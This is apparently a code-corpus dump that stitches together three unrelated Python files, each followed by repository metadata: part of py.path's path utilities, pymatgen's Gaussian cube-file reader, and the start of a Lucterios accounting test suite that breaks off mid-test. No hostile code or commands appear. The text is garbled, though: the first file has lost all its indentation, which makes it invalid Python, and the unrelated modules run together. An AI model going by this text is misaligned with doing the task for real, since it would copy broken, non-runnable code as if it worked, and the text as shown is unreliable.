ext = property(ext, None, None, ext.__doc__)
def dirpath(self, *args, **kwargs):
""" return the directory Path of the current Path joined
with any given path arguments.
"""
return self.new(basename='').join(*args, **kwargs)
def read(self, mode='r'):
""" read and return a bytestring from reading the path. """
if sys.version_info < (2,3):
for x in 'u', 'U':
if x in mode:
mode = mode.replace(x, '')
f = self.open(mode)
try:
return f.read()
finally:
f.close()
def readlines(self, cr=1):
""" read and return a list of lines from the path. if cr is False, the
newline will be removed from the end of each line. """
if not cr:
content = self.read('rU')
return content.split('\n')
else:
f = self.open('rU')
try:
return f.readlines()
finally:
f.close()
def load(self):
""" (deprecated) return object unpickled from self.read() """
f = self.open('rb')
try:
return py.error.checked_call(py.std.pickle.load, f)
finally:
f.close()
def move(self, target):
""" move this path to target. """
if target.relto(self):
raise py.error.EINVAL(target,
"cannot move path into a subdirectory of itself")
try:
self.rename(target)
except py.error.EXDEV: # invalid cross-device link
self.copy(target)
self.remove()
def __repr__(self):
""" return a string representation of this path. """
return repr(str(self))
def check(self, **kw):
""" check a path for existence and properties.
Without arguments, return True if the path exists, otherwise False.
valid checkers::
file=1 # is a file
file=0 # is not a file (may not even exist)
dir=1 # is a dir
link=1 # is a link
exists=1 # exists
You can specify multiple checker definitions, for example::
path.check(file=1, link=1) # a link pointing to a file
"""
if not kw:
kw = {'exists' : 1}
return self.Checkers(self)._evaluate(kw)
def fnmatch(self, pattern):
"""return true if the basename/fullname matches the glob-'pattern'.
valid pattern characters::
* matches everything
? matches any single character
[seq] matches any character in seq
[!seq] matches any char not in seq
If the pattern contains a path-separator then the full path
is used for pattern matching and a '*' is prepended to the
pattern.
if the pattern doesn't contain a path-separator the pattern
is only matched against the basename.
"""
return FNMatcher(pattern)(self)
def relto(self, relpath):
""" return a string which is the relative part of the path
to the given 'relpath'.
"""
if not isinstance(relpath, (str, PathBase)):
raise TypeError("%r: not a string or path object" %(relpath,))
strrelpath = str(relpath)
if strrelpath and strrelpath[-1] != self.sep:
strrelpath += self.sep
#assert strrelpath[-1] == self.sep
#assert strrelpath[-2] != self.sep
strself = str(self)
if sys.platform == "win32" or getattr(os, '_name', None) == 'nt':
if os.path.normcase(strself).startswith(
os.path.normcase(strrelpath)):
return strself[len(strrelpath):]
elif strself.startswith(strrelpath):
return strself[len(strrelpath):]
return ""
def ensure_dir(self, *args):
""" ensure the path joined with args is a directory. """
return self.ensure(*args, **{"dir": True})
def bestrelpath(self, dest):
""" return a string which is a relative path from self
(assumed to be a directory) to dest such that
        self.join(bestrelpath) == dest and if no such
        path can be determined return dest.
"""
try:
if self == dest:
return os.curdir
base = self.common(dest)
if not base: # can be the case on windows
return str(dest)
self2base = self.relto(base)
reldest = dest.relto(base)
if self2base:
n = self2base.count(self.sep) + 1
else:
n = 0
l = [os.pardir] * n
if reldest:
l.append(reldest)
target = dest.sep.join(l)
return target
except AttributeError:
return str(dest)
def exists(self):
return self.check()
def isdir(self):
return self.check(dir=1)
def isfile(self):
return self.check(file=1)
def parts(self, reverse=False):
""" return a root-first list of all ancestor directories
plus the path itself.
"""
current = self
l = [self]
while 1:
last = current
current = current.dirpath()
if last == current:
break
l.append(current)
if not reverse:
l.reverse()
return l
def common(self, other):
""" return the common part shared with the other path
or None if there is no common part.
"""
last = None
for x, y in zip(self.parts(), other.parts()):
if x != y:
return last
last = x
return last
def __add__(self, other):
""" return new path object with 'other' added to the basename"""
return self.new(basename=self.basename+str(other))
def __cmp__(self, other):
""" return sort value (-1, 0, +1). """
try:
return cmp(self.strpath, other.strpath)
except AttributeError:
return cmp(str(self), str(other)) # self.path, other.path)
def __lt__(self, other):
try:
return self.strpath < other.strpath
except AttributeError:
return str(self) < str(other)
def visit(self, fil=None, rec=None, ignore=NeverRaised, bf=False, sort=False):
""" yields all paths below the current one
fil is a filter (glob pattern or callable), if not matching the
path will not be yielded, defaulting to None (everything is
returned)
rec is a filter (glob pattern or callable) that controls whether
a node is descended, defaulting to None
        ignore is an Exception class that is ignored when calling listdir()
on any of the paths (by default, all exceptions are reported)
bf if True will cause a breadthfirst search instead of the
default depthfirst. Default: False
sort if True will sort entries within each directory level.
"""
for x in Visitor(fil, rec, ignore, bf, sort).gen(self):
yield x
def _sortlist(self, res, sort):
if sort:
if hasattr(sort, '__call__'):
res.sort(sort)
else:
res.sort()
def samefile(self, other):
""" return True if other refers to the same stat object as self. """
return self.strpath == str(other)
class Visitor:
def __init__(self, fil, rec, ignore, bf, sort):
if isinstance(fil, str):
fil = FNMatcher(fil)
if isinstance(rec, str):
self.rec = FNMatcher(rec)
elif not hasattr(rec, '__call__') and rec:
self.rec = lambda path: True
else:
self.rec = rec
self.fil = fil
self.ignore = ignore
self.breadthfirst = bf
self.optsort = sort and sorted or (lambda x: x)
def gen(self, path):
try:
entries = path.listdir()
except self.ignore:
return
rec = self.rec
dirs = self.optsort([p for p in entries
if p.check(dir=1) and (rec is None or rec(p))])
if not self.breadthfirst:
for subdir in dirs:
for p in self.gen(subdir):
yield p
for p in self.optsort(entries):
if self.fil is None or self.fil(p):
yield p
if self.breadthfirst:
for subdir in dirs:
for p in self.gen(subdir):
yield p
class FNMatcher:
def __init__(self, pattern):
self.pattern = pattern
def __call__(self, path):
pattern = self.pattern
if pattern.find(path.sep) == -1:
name = path.basename
else:
name = str(path) # path.strpath # XXX svn?
if not os.path.isabs(pattern):
pattern = '*' + path.sep + pattern
return py.std.fnmatch.fnmatch(name, pattern)
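# A minimal usage sketch (not part of the original module): the checker and
# visitor machinery above is normally exercised through py.path.local, which
# derives from PathBase. The directory and patterns below are illustrative.
if __name__ == "__main__":
    import py

    p = py.path.local("/tmp")            # any existing directory will do
    print(p.check(dir=1))                # True if it exists and is a directory
    # recurse only into non-hidden directories, yield *.txt files
    for x in p.visit(fil="*.txt", rec=lambda d: not d.basename.startswith(".")):
        print(x.relto(p))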
|
pexip/os-codespeak-lib
|
py/_path/common.py
|
Python
|
mit
| 12,413
|
[
"VisIt"
] |
70f18df9d5e91d992095a5f6dce3ade6b0e9fbbdd181efa853fc63d49ed5b92f
|
"""
Module for reading Gaussian cube files, which have become one of the standard file formats
for volumetric data in quantum chemistry and solid state physics software packages
(VASP being an exception).
Some basic info about cube files
(abridged info from http://paulbourke.net/dataformats/cube/ by Paul Bourke)
The file consists of a header which includes the atom information and the size as well
as orientation of the volumetric data. The first two lines of the header are comments. The
third line has the number of atoms included in the file followed by the position of the
origin of the volumetric data. The next three lines give the number of voxels along each axis
(x, y, z) followed by the axis vector. The last section in the header is one line for each
atom consisting of 5 numbers, the first is the atom number, the second is the charge, and
the last three are the x,y,z coordinates of the atom center. The volumetric data is straightforward,
one floating point number for each volumetric element.
Example
In the following example the volumetric data is a 40 by 40 by 40 grid, each voxel is 0.283459 units
wide and the volume is aligned with the coordinate axis. There are three atoms.
CPMD CUBE FILE.
OUTER LOOP: X, MIDDLE LOOP: Y, INNER LOOP: Z
3 0.000000 0.000000 0.000000
40 0.283459 0.000000 0.000000
40 0.000000 0.283459 0.000000
40 0.000000 0.000000 0.283459
8 0.000000 5.570575 5.669178 5.593517
1 0.000000 5.562867 5.669178 7.428055
1 0.000000 7.340606 5.669178 5.111259
-0.25568E-04 0.59213E-05 0.81068E-05 0.10868E-04 0.11313E-04 0.35999E-05
: : : : : :
: : : : : :
: : : : : :
In this case there will be 40 x 40 x 40 floating point values
: : : : : :
: : : : : :
: : : : : :
"""
import numpy as np
from monty.io import zopen
from pymatgen.core.sites import Site
from pymatgen.core.structure import Structure
from pymatgen.core.units import bohr_to_angstrom
# TODO: can multiprocessing be incorporated without causing issues during drone assimilation?
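# A brief usage sketch (illustrative only; the file name and radii below are
# hypothetical):
#
#     cube = Cube("total_density.cube")
#     print(cube.natoms, cube.NX, cube.NY, cube.NZ)
#     print(cube.structure)  # pymatgen Structure built from the atom records
#     site_means = cube.get_atomic_site_averages({"O": 0.73, "H": 0.32})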
class Cube:
"""
Class to read Gaussian cube file formats for volumetric data.
Cube files are, by default, written in atomic units, and this
class assumes that convention.
"""
def __init__(self, fname):
"""
Initialize the cube object and store the data as self.data
Args:
fname (str): filename of the cube to read
"""
f = zopen(fname, "rt")
# skip header lines
for i in range(2):
f.readline()
# number of atoms followed by the position of the origin of the volumetric data
line = f.readline().split()
self.natoms = int(line[0])
self.origin = np.array(list(map(float, line[1:])))
# The number of voxels along each axis (x, y, z) followed by the axis vector.
line = f.readline().split()
self.NX = int(line[0])
self.X = np.array([bohr_to_angstrom * float(l) for l in line[1:]])
self.dX = np.linalg.norm(self.X)
line = f.readline().split()
self.NY = int(line[0])
self.Y = np.array([bohr_to_angstrom * float(l) for l in line[1:]])
self.dY = np.linalg.norm(self.Y)
line = f.readline().split()
self.NZ = int(line[0])
self.Z = np.array([bohr_to_angstrom * float(l) for l in line[1:]])
self.dZ = np.linalg.norm(self.Z)
self.voxel_volume = abs(np.dot(np.cross(self.X, self.Y), self.Z))
        self.volume = abs(np.dot(np.cross(self.X.dot(self.NX), self.Y.dot(self.NY)), self.Z.dot(self.NZ)))
# The last section in the header is one line for each atom consisting of 5 numbers,
# the first is the atom number, second is charge,
# the last three are the x,y,z coordinates of the atom center.
self.sites = []
for i in range(self.natoms):
line = f.readline().split()
self.sites.append(Site(line[0], np.multiply(bohr_to_angstrom, list(map(float, line[2:])))))
self.structure = Structure(
lattice=[self.X * self.NX, self.Y * self.NY, self.Z * self.NZ],
species=[s.specie for s in self.sites],
coords=[s.coords for s in self.sites],
coords_are_cartesian=True,
)
# Volumetric data
self.data = np.reshape(np.array(f.read().split()).astype(float), (self.NX, self.NY, self.NZ))
def mask_sphere(self, radius, cx, cy, cz):
"""
Create a mask for a sphere with radius=radius, centered at cx, cy, cz.
Args:
            radius: (float) radius of the mask (in Angstroms)
cx, cy, cz: (float) the fractional coordinates of the center of the sphere
"""
dx, dy, dz = (
np.floor(radius / np.linalg.norm(self.X)).astype(int),
np.floor(radius / np.linalg.norm(self.Y)).astype(int),
np.floor(radius / np.linalg.norm(self.Z)).astype(int),
)
gcd = max(np.gcd(dx, dy), np.gcd(dy, dz), np.gcd(dx, dz))
sx, sy, sz = dx // gcd, dy // gcd, dz // gcd
r = min(dx, dy, dz)
x0, y0, z0 = int(np.round(self.NX * cx)), int(np.round(self.NY * cy)), int(np.round(self.NZ * cz))
centerx, centery, centerz = self.NX // 2, self.NY // 2, self.NZ // 2
a = np.roll(self.data, (centerx - x0, centery - y0, centerz - z0))
i, j, k = np.indices(a.shape, sparse=True)
a = np.sqrt((sx * i - sx * centerx) ** 2 + (sy * j - sy * centery) ** 2 + (sz * k - sz * centerz) ** 2)
indices = a > r
a[indices] = 0
return a
def get_atomic_site_averages(self, atomic_site_radii):
"""
Get the average value around each atomic site.
Args:
atomic_site_radii (dict): dictionary determining the cutoff radius (in Angstroms)
                for averaging around atomic sites (e.g. {'Li': 0.97, 'B': 0.77, ...}).
returns:
Array of site averages, [Average around site 1, Average around site 2, ...]
"""
return [self._get_atomic_site_average(s, atomic_site_radii[s.species_string]) for s in self.structure.sites]
def _get_atomic_site_average(self, site, radius):
"""
Helper function for get_atomic_site_averages.
Args:
site: Site in the structure around which to get the average
radius: (float) the atomic_site_radius (in Angstroms) for given atomic species
returns:
Average around the atomic site
"""
mask = self.mask_sphere(radius, *site.frac_coords)
return np.sum(self.data * mask) / np.count_nonzero(mask)
def get_atomic_site_totals(self, atomic_site_radii):
"""
Get the integrated total in a sphere around each atomic site.
Args:
atomic_site_radii (dict): dictionary determining the cutoff radius (in Angstroms)
                for integrating around atomic sites (e.g. {'Li': 0.97, 'B': 0.77, ...}).
        returns:
            Array of site totals, [Total around site 1, Total around site 2, ...]
"""
return [self._get_atomic_site_total(s, atomic_site_radii[s.species_string]) for s in self.structure.sites]
def _get_atomic_site_total(self, site, radius):
"""
        Helper function for get_atomic_site_totals.
        Args:
            site: Site in the structure around which to get the total
            radius: (float) the atomic_site_radius (in Angstroms) for given atomic species
        returns:
            Integrated total around the atomic site
"""
mask = self.mask_sphere(radius, *site.frac_coords)
return np.sum(self.data * mask)
def get_axis_grid(self, ind):
"""
Modified from pymatgen.io.vasp.outputs
Returns the grid for a particular axis.
Args:
ind (int): Axis index.
"""
ng = self.data.shape
num_pts = ng[ind]
lengths = self.structure.lattice.abc
return [i / num_pts * lengths[ind] for i in range(num_pts)]
def get_average_along_axis(self, ind):
"""
Modified from pymatgen.io.vasp.outputs
Get the averaged total of the volumetric data a certain axis direction.
For example, useful for visualizing Hartree Potentials.
Args:
ind (int): Index of axis.
Returns:
Average total along axis
"""
ng = self.data.shape
m = self.data
if ind == 0:
total = np.sum(np.sum(m, axis=1), 1)
elif ind == 1:
total = np.sum(np.sum(m, axis=0), 1)
else:
total = np.sum(np.sum(m, axis=0), 0)
return total / ng[(ind + 1) % 3] / ng[(ind + 2) % 3]
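# A hedged usage sketch of how the Cube class above might be driven end to end.
# The file name "total_density.cube" and the 1.0 Angstrom per-site radius are
# placeholder assumptions, not values taken from this module.
if __name__ == "__main__":
    cube = Cube("total_density.cube")
    # Planar average along z, e.g. for plotting a potential or density profile.
    z_profile = cube.get_average_along_axis(2)
    # Mean of the volumetric data in a 1.0 Angstrom sphere around each site.
    radii = {site.species_string: 1.0 for site in cube.structure.sites}
    site_averages = cube.get_atomic_site_averages(radii)
    print(len(z_profile), site_averages)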
|
richardtran415/pymatgen
|
pymatgen/io/cube.py
|
Python
|
mit
| 9,239
|
[
"CPMD",
"Gaussian",
"VASP",
"pymatgen"
] |
abef95c451712ad3698ee388dad144c1f7e726a44ae8d0c417b19b78cc01f81a
|
# -*- coding: utf-8 -*-
'''
Unit tests for the Django accounting module
@author: Laurent GAY
@organization: sd-libre.fr
@contact: info@sd-libre.fr
@copyright: 2015 sd-libre.fr
@license: This file is part of Lucterios.
Lucterios is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
Lucterios is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with Lucterios. If not, see <http://www.gnu.org/licenses/>.
'''
from __future__ import unicode_literals
from shutil import rmtree
from datetime import date
from _io import StringIO
from lucterios.framework.test import LucteriosTest
from lucterios.framework.filetools import get_user_dir
from diacamma.accounting.views_entries import EntryAccountList, \
EntryAccountEdit, EntryAccountAfterSave, EntryLineAccountAdd, \
EntryLineAccountEdit, EntryAccountValidate, EntryAccountClose, \
EntryAccountReverse, EntryAccountCreateLinked, EntryAccountLink, \
EntryAccountDel, EntryAccountOpenFromLine, EntryAccountShow, \
EntryLineAccountDel, EntryAccountUnlock, EntryAccountImport
from diacamma.accounting.test_tools import default_compta_fr, initial_thirds_fr,\
fill_entries_fr, default_costaccounting, fill_thirds_fr, fill_accounts_fr
from diacamma.accounting.models import EntryAccount, CostAccounting, FiscalYear
from diacamma.accounting.views_other import CostAccountingAddModify
from diacamma.accounting.views import ThirdShow
from diacamma.accounting.views_accounts import FiscalYearBegin, FiscalYearClose,\
FiscalYearReportLastYear, ChartsAccountList
class EntryTest(LucteriosTest):
def setUp(self):
initial_thirds_fr()
LucteriosTest.setUp(self)
default_compta_fr()
rmtree(get_user_dir(), True)
def test_empty_list(self):
self.factory.xfer = EntryAccountList()
self.calljson('/diacamma.accounting/entryAccountList', {}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'entryAccountList')
self.assert_count_equal('', 8)
self.assert_json_equal('SELECT', 'year', '1')
self.assert_select_equal('year', 1) # nb=1
self.assert_json_equal('SELECT', 'journal', '4')
self.assert_select_equal('journal', 6) # nb=6
self.assert_json_equal('SELECT', 'filter', '1')
self.assert_select_equal('filter', 5) # nb=5
self.assert_count_equal('entryline', 0)
self.assert_json_equal('', '#entryline/headers/@5/@0', 'debit')
self.assert_json_equal('', '#entryline/headers/@5/@2', 'C2EUR')
self.assert_json_equal('', '#entryline/headers/@5/@4', '{[p align=\'right\']}{[font color="green"]}%s{[/font]}{[/p]};{[p align=\'right\']}{[font color="blue"]}%s{[/font]}{[/p]};')
self.assert_json_equal('', '#entryline/headers/@6/@0', 'credit')
self.assert_json_equal('', '#entryline/headers/@6/@2', 'C2EUR')
self.assert_json_equal('', '#entryline/headers/@6/@4', '{[p align=\'right\']}{[font color="green"]}%s{[/font]}{[/p]};{[p align=\'right\']}{[font color="blue"]}%s{[/font]}{[/p]};')
self.assert_json_equal('LABELFORM', 'result', [0.00, 0.00, 0.00, 0.00, 0.00])
def test_add_entry(self):
self.factory.xfer = EntryAccountEdit()
self.calljson('/diacamma.accounting/entryAccountEdit', {'year': '1', 'journal': '2'}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'entryAccountEdit')
self.assert_count_equal('', 4)
self.assert_json_equal('SELECT', 'journal', '2')
self.assert_json_equal('DATE', 'date_value', '2015-12-31')
self.assert_json_equal('EDIT', 'designation', '')
self.assertEqual(len(self.json_actions), 2)
self.factory.xfer = EntryAccountEdit()
self.calljson('/diacamma.accounting/entryAccountEdit', {'SAVE': 'YES', 'year': '1', 'journal': '2',
'date_value': '2015-02-13', 'designation': 'un plein cadie'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountEdit')
self.assertEqual(self.response_json['action']['id'], "diacamma.accounting/entryAccountAfterSave")
self.assertEqual(len(self.response_json['action']['params']), 1)
self.assertEqual(self.response_json['action']['params']['entryaccount'], 1)
self.assertEqual(len(self.json_context), 4)
self.assertEqual(self.json_context['year'], "1")
self.assertEqual(self.json_context['journal'], "2")
self.assertEqual(self.json_context['date_value'], "2015-02-13")
self.assertEqual(self.json_context['designation'], "un plein cadie")
self.factory.xfer = EntryAccountAfterSave()
self.calljson('/diacamma.accounting/entryAccountAfterSave', {'SAVE': 'YES', 'year': '1', 'journal': '2',
'date_value': '2015-02-13', 'designation': 'un plein cadie', 'entryaccount': "1"}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountAfterSave')
self.assertEqual(self.response_json['action']['id'], "diacamma.accounting/entryAccountEdit")
self.assertEqual(self.response_json['action']['params'], None)
self.assertEqual(len(self.json_context), 3)
self.assertEqual(self.json_context['entryaccount'], "1")
self.assertEqual(self.json_context['year'], "1")
self.assertEqual(self.json_context['journal'], "2")
def test_add_entry_bad_date(self):
self.factory.xfer = EntryAccountEdit()
self.calljson('/diacamma.accounting/entryAccountEdit', {'SAVE': 'YES', 'year': '1', 'journal': '2',
'date_value': '2017-04-20', 'designation': 'Truc'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountEdit')
self.assertEqual(self.response_json['action']['params']['entryaccount'], 1)
self.factory.xfer = EntryAccountEdit()
self.calljson('/diacamma.accounting/entryAccountEdit',
{'year': '1', 'journal': '2', 'entryaccount': '1'}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'entryAccountEdit')
self.assert_count_equal('', 13)
self.assert_json_equal('SELECT', 'journal', '2')
self.assert_json_equal('DATE', 'date_value', '2015-12-31')
self.assert_json_equal('EDIT', 'designation', 'Truc')
self.assertEqual(len(self.json_actions), 2)
self.factory.xfer = EntryAccountEdit()
self.calljson('/diacamma.accounting/entryAccountEdit', {'SAVE': 'YES', 'year': '1', 'journal': '2',
'date_value': '2010-04-20', 'designation': 'Machin'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountEdit')
self.assertEqual(self.response_json['action']['params']['entryaccount'], 2)
self.factory.xfer = EntryAccountEdit()
self.calljson('/diacamma.accounting/entryAccountEdit',
{'year': '1', 'journal': '2', 'entryaccount': '2'}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'entryAccountEdit')
self.assert_count_equal('', 13)
self.assert_json_equal('SELECT', 'journal', '2')
self.assert_json_equal('DATE', 'date_value', '2015-01-01')
self.assert_json_equal('EDIT', 'designation', 'Machin')
self.assertEqual(len(self.json_actions), 2)
def test_add_line_third(self):
self.factory.xfer = EntryAccountEdit()
self.calljson('/diacamma.accounting/entryAccountEdit', {'SAVE': 'YES', 'year': '1', 'journal': '2',
'date_value': '2015-02-13', 'designation': 'un plein cadie'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountEdit')
self.factory.xfer = EntryAccountEdit()
self.calljson('/diacamma.accounting/entryAccountEdit',
{'year': '1', 'journal': '2', 'entryaccount': '1'}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'entryAccountEdit')
self.assert_count_equal('', 13)
self.assert_json_equal('SELECT', 'journal', '2')
self.assert_json_equal('DATE', 'date_value', '2015-02-13')
self.assert_json_equal('EDIT', 'designation', 'un plein cadie')
self.assert_count_equal('entrylineaccount_serial', 0)
self.assert_json_equal('EDIT', 'num_cpt_txt', '')
self.assert_json_equal('SELECT', 'num_cpt', 'None')
self.assert_select_equal('num_cpt', 0) # nb=0
self.assert_json_equal('FLOAT', 'debit_val', '0.00')
self.assert_json_equal('FLOAT', 'credit_val', '0.00')
self.assertEqual(len(self.json_actions), 2)
self.factory.xfer = EntryAccountEdit()
self.calljson('/diacamma.accounting/entryAccountEdit',
{'year': '1', 'journal': '2', 'entryaccount': '1', 'num_cpt_txt': '401'}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'entryAccountEdit')
self.assert_count_equal('', 17)
self.assert_json_equal('EDIT', 'num_cpt_txt', '401')
self.assert_json_equal('SELECT', 'num_cpt', '4')
self.assert_select_equal('num_cpt', 1) # nb=1
self.assert_json_equal('FLOAT', 'debit_val', '0.00')
self.assert_json_equal('FLOAT', 'credit_val', '0.00')
self.assert_json_equal('SELECT', 'third', '0')
self.assert_json_equal('BUTTON', 'new-third', '')
self.assert_action_equal('POST', '#new-third/action', ('Créer', 'images/new.png', 'diacamma.accounting', 'thirdAdd', 0, 1, 1, {'new_account': '401'}))
self.assert_select_equal('third', 5) # nb=5
self.assert_count_equal('entrylineaccount_serial', 0)
self.assertEqual(len(self.json_actions), 2)
self.factory.xfer = EntryLineAccountAdd()
self.calljson('/diacamma.accounting/entryLineAccountAdd', {'year': '1', 'journal': '2', 'entryaccount': '1', 'num_cpt_txt': '401',
'num_cpt': '4', 'third': 0, 'debit_val': '0.0', 'credit_val': '152.34'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryLineAccountAdd')
self.assertEqual(len(self.json_context), 3)
self.assertEqual(self.json_context['entryaccount'], "1")
self.assertEqual(self.json_context['year'], "1")
self.assertEqual(self.json_context['journal'], "2")
self.factory.xfer = EntryAccountEdit()
self.calljson('/diacamma.accounting/entryAccountEdit',
{'year': '1', 'journal': '2', 'entryaccount': '1', 'serial_entry': "-1|4|0|152.340000|0|0|None|"}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'entryAccountEdit')
self.assert_count_equal('', 13)
self.assert_count_equal('entrylineaccount_serial', 1)
self.assert_json_equal('', 'entrylineaccount_serial/@0/entry_account', '[401] 401')
self.assert_json_equal('', 'entrylineaccount_serial/@0/debit', 0)
self.assert_json_equal('', 'entrylineaccount_serial/@0/credit', 152.34)
self.assert_json_equal('', 'entrylineaccount_serial/@0/reference', None)
self.assert_json_equal('', 'entrylineaccount_serial/@0/costaccounting', None)
self.assertEqual(len(self.json_actions), 2)
def test_add_line_revenue(self):
self.factory.xfer = EntryAccountEdit()
self.calljson('/diacamma.accounting/entryAccountEdit', {'SAVE': 'YES', 'year': '1', 'journal': '2',
'date_value': '2015-02-13', 'designation': 'un plein cadie'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountEdit')
self.factory.xfer = EntryAccountEdit()
self.calljson('/diacamma.accounting/entryAccountEdit',
{'year': '1', 'journal': '2', 'entryaccount': '1', 'serial_entry': "-1|4|0|152.340000|0|0|None|", 'num_cpt_txt': '60'}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'entryAccountEdit')
self.assert_count_equal('', 16)
self.assert_count_equal('entrylineaccount_serial', 1)
self.assert_json_equal('EDIT', 'num_cpt_txt', '60')
self.assert_json_equal('SELECT', 'num_cpt', '11')
self.assert_select_equal('num_cpt', 4) # nb=4
self.assert_json_equal('FLOAT', 'debit_val', '152.34')
self.assert_json_equal('FLOAT', 'credit_val', '0.00')
self.assertEqual(len(self.json_actions), 2)
self.factory.xfer = EntryLineAccountAdd()
self.calljson('/diacamma.accounting/entryLineAccountAdd', {'year': '1', 'journal': '2', 'entryaccount': '1', 'serial_entry': "-1|4|0|152.340000|0|0|None|",
'num_cpt_txt': '60', 'num_cpt': '12', 'debit_val': '152.34', 'credit_val': '0.0'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryLineAccountAdd')
self.assertEqual(len(self.json_context), 3)
self.assertEqual(self.json_context['entryaccount'], '1')
self.assertEqual(self.json_context['year'], "1")
self.assertEqual(self.json_context['journal'], "2")
self.factory.xfer = EntryAccountEdit()
self.calljson('/diacamma.accounting/entryAccountEdit',
{'year': '1', 'journal': '2', 'entryaccount': '1', 'serial_entry': "-1|4|0|152.340000|0|0|None|\n-2|12|0|152.340000|0|0|None|"}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'entryAccountEdit')
self.assert_count_equal('', 13)
self.assert_count_equal('entrylineaccount_serial', 2)
self.assert_json_equal('', 'entrylineaccount_serial/@0/entry_account', '[401] 401')
self.assert_json_equal('', 'entrylineaccount_serial/@0/debit', 0)
self.assert_json_equal('', 'entrylineaccount_serial/@0/credit', 152.34)
self.assert_json_equal('', 'entrylineaccount_serial/@0/reference', None)
self.assert_json_equal('', 'entrylineaccount_serial/@0/costaccounting', None)
self.assert_json_equal('', 'entrylineaccount_serial/@1/entry_account', '[602] 602')
self.assert_json_equal('', 'entrylineaccount_serial/@1/costaccounting', None)
self.assert_json_equal('', 'entrylineaccount_serial/@1/debit', -152.34)
self.assert_json_equal('', 'entrylineaccount_serial/@1/credit', 0)
self.assert_json_equal('', 'entrylineaccount_serial/@1/reference', None)
self.assertEqual(len(self.json_actions), 2)
self.assertEqual(self.json_actions[0]['id'], "diacamma.accounting/entryAccountValidate")
def test_add_line_payoff(self):
self.factory.xfer = EntryAccountEdit()
self.calljson('/diacamma.accounting/entryAccountEdit', {'SAVE': 'YES', 'year': '1', 'journal': '3',
'date_value': '2015-02-13', 'designation': 'un plein cadie'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountEdit')
self.factory.xfer = EntryAccountEdit()
self.calljson('/diacamma.accounting/entryAccountEdit',
{'year': '1', 'journal': '3', 'entryaccount': '1', 'serial_entry': "-1|4|0|152.340000|0|0|None|", 'num_cpt_txt': '5'}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'entryAccountEdit')
self.assert_count_equal('', 16)
self.assert_count_equal('entrylineaccount_serial', 1)
self.assert_json_equal('EDIT', 'num_cpt_txt', '5')
self.assert_json_equal('SELECT', 'num_cpt', '2')
self.assert_select_equal('num_cpt', 2) # nb=2
self.assert_json_equal('FLOAT', 'debit_val', '152.34')
self.assert_json_equal('FLOAT', 'credit_val', '0.00')
self.assert_json_equal('EDIT', 'reference', '')
self.assertEqual(len(self.json_actions), 2)
self.factory.xfer = EntryLineAccountAdd()
self.calljson('/diacamma.accounting/entryLineAccountAdd', {'year': '1', 'journal': '3', 'entryaccount': '1', 'serial_entry': "-1|4|0|152.340000|0|0|None|",
'num_cpt_txt': '5', 'num_cpt': '3', 'debit_val': '152.34', 'credit_val': '0.0', 'reference': 'aaabbb'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryLineAccountAdd')
self.assertEqual(len(self.json_context), 3)
self.assertEqual(self.json_context['entryaccount'], '1')
self.assertEqual(self.json_context['year'], "1")
self.assertEqual(self.json_context['journal'], "3")
self.factory.xfer = EntryAccountEdit()
self.calljson('/diacamma.accounting/entryAccountEdit',
{'year': '1', 'journal': '2', 'entryaccount': '1', 'serial_entry': "-1|4|0|152.340000|0|0|None|\n-2|3|0|152.340000|0|0|aaabbb|"}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'entryAccountEdit')
self.assert_count_equal('', 13)
self.assert_count_equal('entrylineaccount_serial', 2)
self.assert_json_equal('', 'entrylineaccount_serial/@0/entry_account', '[401] 401')
self.assert_json_equal('', 'entrylineaccount_serial/@0/debit', 0)
self.assert_json_equal('', 'entrylineaccount_serial/@0/credit', 152.34)
self.assert_json_equal('', 'entrylineaccount_serial/@0/reference', None)
self.assert_json_equal('', 'entrylineaccount_serial/@0/costaccounting', None)
self.assert_json_equal('', 'entrylineaccount_serial/@1/entry_account', '[531] 531')
self.assert_json_equal('', 'entrylineaccount_serial/@1/debit', -152.34)
self.assert_json_equal('', 'entrylineaccount_serial/@1/credit', 0)
self.assert_json_equal('', 'entrylineaccount_serial/@1/reference', 'aaabbb')
self.assert_json_equal('', 'entrylineaccount_serial/@1/costaccounting', None)
self.assertEqual(len(self.json_actions), 2)
self.assertEqual(self.json_actions[0]['id'], "diacamma.accounting/entryAccountValidate")
def test_change_line_third(self):
self.factory.xfer = EntryAccountEdit()
self.calljson('/diacamma.accounting/entryAccountEdit', {'SAVE': 'YES', 'year': '1', 'journal': '2',
'date_value': '2015-02-13', 'designation': 'un plein cadie'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountEdit')
self.factory.xfer = EntryLineAccountEdit()
self.calljson('/diacamma.accounting/entryLineAccountEdit', {'year': '1', 'journal': '2', 'entryaccount': '1',
'serial_entry': "-1|4|0|152.340000|0|0|None|\n-2|12|0|152.340000|0|0|None|", 'entrylineaccount_serial': '-1'}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'entryLineAccountEdit')
self.assert_count_equal('', 6)
